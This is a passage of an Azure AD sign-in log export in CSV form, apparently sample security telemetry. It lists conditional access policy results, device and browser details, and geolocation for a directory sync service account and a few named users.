'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:49,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e9cd98cc-4177-459a-870c-d2e4abad0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,WindowsDefenderATP,e9cd98cc-4177-459a-870c-d2e4abad0700,SigninLogs,Sucess,50.6406517,5.572050095
+1774,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1b58562-5ee3-4616-8db2-9c76c5814f8f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",86807d56-c656-4319-9bdc-577ed9520700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,86807d56-c656-4319-9bdc-577ed9520700,SigninLogs,Sucess,36.6404686,-78.26995087
+1775,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,551ca8df-6868-4733-9f27-c6767ffc1f4f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbcd7f19-25f4-4cfd-824c-94dcfcc10600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbcd7f19-25f4-4cfd-824c-94dcfcc10600,SigninLogs,Sucess,36.6404686,-78.26995087
+1776,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:29.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e726f7c3-9a09-40c4-a93a-eae964e4b2a1,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:51,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",09460de7-98b0-4e81-a1a9-febec9282100,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,09460de7-98b0-4e81-a1a9-febec9282100,SigninLogs,Sucess,51.4458313,-0.969720006
+1777,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,551ca8df-6868-4733-9f27-c6767ffc1f4f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbcd7f19-25f4-4cfd-824c-94dcfcc10600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbcd7f19-25f4-4cfd-824c-94dcfcc10600,SigninLogs,Sucess,36.6404686,-78.26995087
+1778,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:29.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e726f7c3-9a09-40c4-a93a-eae964e4b2a1,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:51,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",09460de7-98b0-4e81-a1a9-febec9282100,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,09460de7-98b0-4e81-a1a9-febec9282100,SigninLogs,Sucess,51.4458313,-0.969720006
+1779,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:55,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5714f801-8f28-450e-90af-3c3cd63a2700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5714f801-8f28-450e-90af-3c3cd63a2700,SigninLogs,Sucess,32.0840416,34.88776016
+1780,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e3337d53-73c2-4503-839f-19840413cacf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",db359221-fdda-4bf1-8b37-6f46fafc0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,db359221-fdda-4bf1-8b37-6f46fafc0900,SigninLogs,Sucess,36.6404686,-78.26995087
+1781,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f00c2e23-e90e-4a22-b29b-b5dd75942de3,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 